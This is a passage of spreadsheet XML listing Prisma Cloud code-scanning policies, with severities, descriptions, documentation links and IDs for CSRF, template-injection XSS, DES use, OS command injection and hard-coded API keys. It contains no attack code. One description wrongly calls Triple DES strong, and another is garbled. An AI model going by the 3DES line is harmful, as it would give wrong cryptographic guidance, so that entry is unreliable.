      <c r="B494" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C494" s="2" t="inlineStr"/>
      <c r="D494" t="inlineStr"/>
      <c r="E494" t="inlineStr"/>
      <c r="F494" t="inlineStr"/>
      <c r="G494" t="b">
        <v>1</v>
      </c>
      <c r="H4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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J494" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K494" t="inlineStr">
        <is>
          <t>Cross-site request forgery weakness</t>
        </is>
      </c>
      <c r="L494" t="inlineStr"/>
      <c r="M494" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N494" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O494" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P494" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q494" t="inlineStr"/>
      <c r="R494" t="inlineStr"/>
      <c r="S494" t="inlineStr"/>
      <c r="T494" t="b">
        <v>0</v>
      </c>
      <c r="U494" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V494" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W494" t="inlineStr">
        <is>
          <t>CSRF protections are disabled or cookies are set with the SameSite attribute to values other than \"Strict\". These configurations can expose apps to attacks.</t>
        </is>
      </c>
      <c r="X494" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-104</t>
        </is>
      </c>
      <c r="Y494" t="inlineStr"/>
      <c r="Z494" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA494" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB494" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC494" t="inlineStr">
        <is>
          <t>CKV3_SAST_104</t>
        </is>
      </c>
      <c r="AD494" t="b">
        <v>1</v>
      </c>
      <c r="AE494" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF494" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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4" t="inlineStr">
        <is>
          <t>212f075a-5c17-46a6-a094-9c24a06cc66c</t>
        </is>
      </c>
      <c r="AI494" t="inlineStr"/>
      <c r="AJ494" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK494" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" t="inlineStr"/>
      <c r="B495" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C495" s="2" t="inlineStr"/>
      <c r="D495" t="inlineStr"/>
      <c r="E495" t="inlineStr"/>
      <c r="F495" t="inlineStr"/>
      <c r="G495" t="b">
        <v>1</v>
      </c>
      <c r="H4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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J495" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K495" t="inlineStr">
        <is>
          <t>Unsafe template rendering</t>
        </is>
      </c>
      <c r="L495" t="inlineStr"/>
      <c r="M495" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N495" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O495" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P495" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q495" t="inlineStr"/>
      <c r="R495" t="inlineStr"/>
      <c r="S495" t="inlineStr"/>
      <c r="T495" t="b">
        <v>0</v>
      </c>
      <c r="U495" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V495" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W495" t="inlineStr">
        <is>
          <t>This policy identifies potential template injection vulnerabilities in Go (Golang) code, where user input is improperly neutralized during web page generation, leading to Cross-Site Scripting (XSS) attacks. Such vulnerabilities can be exploited to execute malicious scripts in the context of a user's browser. The policy ensures that user input is properly sanitized and encoded depending on the specific context it is used in, thereby preventing XSS attacks.</t>
        </is>
      </c>
      <c r="X495" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-258</t>
        </is>
      </c>
      <c r="Y495" t="inlineStr"/>
      <c r="Z495" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA495" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB495" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC495" t="inlineStr">
        <is>
          <t>CKV3_SAST_258</t>
        </is>
      </c>
      <c r="AD495" t="b">
        <v>1</v>
      </c>
      <c r="AE495" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF495" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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5" t="inlineStr">
        <is>
          <t>c4aec233-ef76-43e6-b9be-65df8bdfd50f</t>
        </is>
      </c>
      <c r="AI495" t="inlineStr"/>
      <c r="AJ495" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK495" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" t="inlineStr"/>
      <c r="B496" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C496" s="2" t="inlineStr"/>
      <c r="D496" t="inlineStr"/>
      <c r="E496" t="inlineStr"/>
      <c r="F496" t="inlineStr"/>
      <c r="G496" t="b">
        <v>1</v>
      </c>
      <c r="H4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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J496" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K496" t="inlineStr">
        <is>
          <t>Unsafe DES algorithm used</t>
        </is>
      </c>
      <c r="L496" t="inlineStr"/>
      <c r="M496" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N496" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O496" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P496" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q496" t="inlineStr"/>
      <c r="R496" t="inlineStr"/>
      <c r="S496" t="inlineStr"/>
      <c r="T496" t="b">
        <v>0</v>
      </c>
      <c r="U496" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V496" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W496" t="inlineStr">
        <is>
          <t>Triple DES (also known as 3DES or DESede) is considered strong ciphers for modern applications. NIST recommends the usage of AES block ciphers instead of 3DES.</t>
        </is>
      </c>
      <c r="X496" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-17</t>
        </is>
      </c>
      <c r="Y496" t="inlineStr"/>
      <c r="Z496" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA496" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB496" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC496" t="inlineStr">
        <is>
          <t>CKV3_SAST_17</t>
        </is>
      </c>
      <c r="AD496" t="b">
        <v>1</v>
      </c>
      <c r="AE496" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF496" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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6" t="inlineStr">
        <is>
          <t>630a9643-7033-4c05-a682-5619ee816b48</t>
        </is>
      </c>
      <c r="AI496" t="inlineStr"/>
      <c r="AJ496" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK496" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" t="inlineStr"/>
      <c r="B497" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C497" s="2" t="inlineStr"/>
      <c r="D497" t="inlineStr"/>
      <c r="E497" t="inlineStr"/>
      <c r="F497" t="inlineStr"/>
      <c r="G497" t="b">
        <v>1</v>
      </c>
      <c r="H4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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J497" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K497" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS Command Injection')</t>
        </is>
      </c>
      <c r="L497" t="inlineStr"/>
      <c r="M497" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N497" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O497" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P497" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q497" t="inlineStr"/>
      <c r="R497" t="inlineStr"/>
      <c r="S497" t="inlineStr"/>
      <c r="T497" t="b">
        <v>0</v>
      </c>
      <c r="U497" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V497" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W497" t="inlineStr">
        <is>
          <t>User input should never be used in constructing commands or command arguments to functions which execute OS commands. This includes filenames supplied by user uploads or downloads.</t>
        </is>
      </c>
      <c r="X497" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-123</t>
        </is>
      </c>
      <c r="Y497" t="inlineStr"/>
      <c r="Z497" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA497" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB497" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC497" t="inlineStr">
        <is>
          <t>CKV3_SAST_123</t>
        </is>
      </c>
      <c r="AD497" t="b">
        <v>1</v>
      </c>
      <c r="AE497" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF497" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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7" t="inlineStr">
        <is>
          <t>7f2f8b6f-8a48-442a-96cd-09cf09e49c0e</t>
        </is>
      </c>
      <c r="AI497" t="inlineStr"/>
      <c r="AJ497" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK497" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" t="inlineStr"/>
      <c r="B498" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C498" s="2" t="inlineStr"/>
      <c r="D498" t="inlineStr"/>
      <c r="E498" t="inlineStr"/>
      <c r="F498" t="inlineStr"/>
      <c r="G498" t="b">
        <v>1</v>
      </c>
      <c r="H4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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J498" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K498" t="inlineStr">
        <is>
          <t>CSRF protections disabled</t>
        </is>
      </c>
      <c r="L498" t="inlineStr"/>
      <c r="M498" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N498" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O498" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P498" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q498" t="inlineStr"/>
      <c r="R498" t="inlineStr"/>
      <c r="S498" t="inlineStr"/>
      <c r="T498" t="b">
        <v>0</v>
      </c>
      <c r="U498" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V498" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W498" t="inlineStr">
        <is>
          <t>Detected an vulnerable when disabling CSRF protections is security-sensitive</t>
        </is>
      </c>
      <c r="X498" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-56</t>
        </is>
      </c>
      <c r="Y498" t="inlineStr"/>
      <c r="Z498" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA498" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB498" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC498" t="inlineStr">
        <is>
          <t>CKV3_SAST_56</t>
        </is>
      </c>
      <c r="AD498" t="b">
        <v>1</v>
      </c>
      <c r="AE498" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF498" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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8" t="inlineStr">
        <is>
          <t>466b43de-09e9-41f4-957d-66b689ae77f8</t>
        </is>
      </c>
      <c r="AI498" t="inlineStr"/>
      <c r="AJ498" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK498" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" t="inlineStr"/>
      <c r="B499" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C499" s="2" t="inlineStr"/>
      <c r="D499" t="inlineStr"/>
      <c r="E499" t="inlineStr"/>
      <c r="F499" t="inlineStr"/>
      <c r="G499" t="b">
        <v>1</v>
      </c>
      <c r="H4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499" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J499" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K499" t="inlineStr">
        <is>
          <t>Firebase Cloud Messaging API key detected in code</t>
        </is>
      </c>
      <c r="L499" t="inlineStr"/>
      <c r="M499" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N499" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O499" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P499" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q499" t="inlineStr"/>
      <c r="R499" t="inlineStr"/>
      <c r="S499" t="inlineStr"/>
      <c r="T499" t="b">
        <v>0</v>
      </c>
      <c r="U499" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V499" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W499" t="inlineStr">
        <is>
          <t>Firebase Cloud Messaging API key</t>
        </is>
      </c>
      <c r="X499" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-88</t>
        </is>
      </c>
      <c r="Y499" t="inlineStr"/>
      <c r="Z499" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA499" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB499" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC499" t="inlineStr">
        <is>
          <t>CKV_SECRET_88</t>
        </is>
      </c>
      <c r="AD499" t="b">
        <v>1</v>
      </c>
      <c r="AE499" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF499" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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499" t="inlineStr">
        <is>
          <t>016ab87c-b917-434d-a58b-128fa0e78b98</t>
        </is>
      </c>
      <c r="AI499" t="inlineStr"/>
      <c r="AJ499" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK499" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" t="inlineStr"/>
      <c r="B500" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C500" s="2" t="inlineStr"/>
      <c r="D500" t="inlineStr"/>
      <c r="E500" t="inlineStr"/>
      <c r="F500" t="inlineStr"/>
      <c r="G500" t="b">
        <v>1</v>
      </c>
      <c r="H5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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J500" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K500" t="inlineStr">
        <is>
          <t>reCAPATCHA key detected in code</t>
        </is>
      </c>
      <c r="L500" t="inlineStr"/>
      <c r="M500" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N500" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O500" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P500" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q500" t="inlineStr"/>
      <c r="R500" t="inlineStr"/>
      <c r="S500" t="inlineStr"/>
      <c r="T500" t="b">
        <v>0</v>
      </c>
      <c r="U500" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V500" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W500" t="inlineStr">
        <is>
          <t>reCAPATCHA key</t>
        </is>
      </c>
      <c r="X500" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-146</t>
        </is>
      </c>
      <c r="Y500" t="inlineStr"/>
      <c r="Z500" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA500" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB500" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC500" t="inlineStr">
        <is>
          <t>CKV_SECRET_146</t>
        </is>
      </c>
      <c r="AD500" t="b">
        <v>1</v>
      </c>
      <c r="AE500" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF500" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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0" t="inlineStr">
        <is>
          <t>61c1b77d-0ee6-404e-a59d-14f6a5864e55</t>
        </is>
      </c>
      <c r="AI500" t="inlineStr"/>
      <c r="AJ500" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK500" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" t="inlineStr"/>
      <c r="B501" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C501" s="2" t="inlineStr"/>
      <c r="D501" t="inlineStr"/>
      <c r="E501" t="inlineStr"/>
      <c r="F501" t="inlineStr"/>
      <c r="G501" t="b">
        <v>1</v>
      </c>
      <c r="H5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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J501" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K501" t="inlineStr">
        <is>
          <t>HubSpot API Key detected in code</t>
        </is>
      </c>
      <c r="L501" t="inlineStr"/>
      <c r="M501" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N501" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O501" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P501" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q501" t="inlineStr"/>
      <c r="R501" t="inlineStr"/>
      <c r="S501" t="inlineStr"/>
      <c r="T501" t="b">
        <v>0</v>
      </c>
      <c r="U501" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V501" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W501" t="inlineStr">
        <is>
          <t>HubSpot API Key</t>
        </is>
      </c>
      <c r="X501" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-49</t>
        </is>
      </c>
      <c r="Y501" t="inlineStr"/>
      <c r="Z501" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA501" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB501" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC501" t="inlineStr">
        <is>
          <t>CKV_SECRET_49</t>
        </is>
      </c>
      <c r="AD501" t="b">
        <v>1</v>
      </c>
      <c r="AE501" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF501" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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1" t="inlineStr">
        <is>
          <t>bfdda3a2-e2d2-4bfb-ba7d-49466c108a88</t>
        </is>
      </c>
      <c r="AI501" t="inlineStr"/>
      <c r="AJ501" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK501" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" t="inlineStr"/>
      <c r="B502" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C502" s="2" t="inlineStr"/>
      <c r="D502" t="inlineStr"/>
      <c r="E502" t="inlineStr"/>
      <c r="F502" t="inlineStr"/>
      <c r="G502" t="b">
        <v>1</v>
      </c>
      <c r="H5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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J502" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K502" t="inlineStr">
        <is>
          <t>Algolia Key detected in code</t>
        </is>
      </c>
      <c r="L502" t="inlineStr"/>
      <c r="M502" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N502" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O502" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P502" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q502" t="inlineStr"/>
      <c r="R502" t="inlineStr"/>
      <c r="S502" t="inlineStr"/>
      <c r="T502" t="b">
        <v>0</v>
      </c>
      <c r="U502" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V502" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W502" t="inlineStr">
        <is>
          <t>Algolia Key</t>
        </is>
      </c>
      <c r="X502" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-22</t>
        </is>
      </c>
      <c r="Y502" t="inlineStr"/>
      <c r="Z502" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA502" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB502" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC502" t="inlineStr">
        <is>
          <t>CKV_SECRET_22</t>
        </is>
      </c>
      <c r="AD502" t="b">
        <v>1</v>
      </c>
      <c r="AE502" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF502" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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2" t="inlineStr">
        <is>
          <t>1ea47a16-0199-4117-93f9-01de3fcdd814</t>
        </is>
      </c>
      <c r="AI502" t="inlineStr"/>
      <c r="AJ502" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK502" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" t="inlineStr"/>
      <c r="B503" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C503" s="2" t="inlineStr"/>
      <c r="D503" t="inlineStr"/>
      <c r="E503" t="inlineStr"/>
      <c r="F503" t="inlineStr"/>
      <c r="G503" t="b">
        <v>1</v>
      </c>
      <c r="H5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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J503" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K503" t="inlineStr">
        <is>
          <t>Paypal Token Id detected in code</t>
        </is>
      </c>
      <c r="L503" t="inlineStr"/>
      <c r="M503" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N503" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O503" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P503" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q503" t="inlineStr"/>
      <c r="R503" t="inlineStr"/>
      <c r="S503" t="inlineStr"/>
      <c r="T503" t="b">
        <v>0</v>
      </c>
      <c r="U503" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V503" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W503" t="inlineStr">
        <is>
          <t>Paypal Token Id</t>
        </is>
      </c>
      <c r="X503" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-83</t>
        </is>
      </c>
      <c r="Y503" t="inlineStr"/>
      <c r="Z503" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA503" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB503" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC503" t="inlineStr">
        <is>
          <t>CKV_SECRET_83</t>
        </is>
      </c>
      <c r="AD503" t="b">
        <v>1</v>
      </c>
      <c r="AE503" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF503" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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3" t="inlineStr">
        <is>
          <t>0568da89-3865-4a06-835c-d9b6e299f684</t>
        </is>
      </c>
      <c r="AI503" t="inlineStr"/>
      <c r="AJ503" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK503" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" t="inlineStr"/>
      <c r="B504" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C504" s="2" t="inlineStr"/>
      <c r="D504" t="inlineStr"/>
      <c r="E504" t="inlineStr"/>
      <c r="F504" t="inlineStr"/>
      <c r="G504" t="b">
        <v>1</v>
      </c>
      <c r="H5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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J504" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K504" t="inlineStr">
        <is>
          <t>Plaid access token detected in code</t>
        </is>
      </c>
      <c r="L504" t="inlineStr"/>
      <c r="M504" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N504" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O504" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P504" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q504" t="inlineStr"/>
      <c r="R504" t="inlineStr"/>
      <c r="S504" t="inlineStr"/>
      <c r="T504" t="b">
        <v>0</v>
      </c>
      <c r="U504" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V504" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W504" t="inlineStr">
        <is>
          <t>Plaid access token</t>
        </is>
      </c>
      <c r="X504" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-242</t>
        </is>
      </c>
      <c r="Y504" t="inlineStr"/>
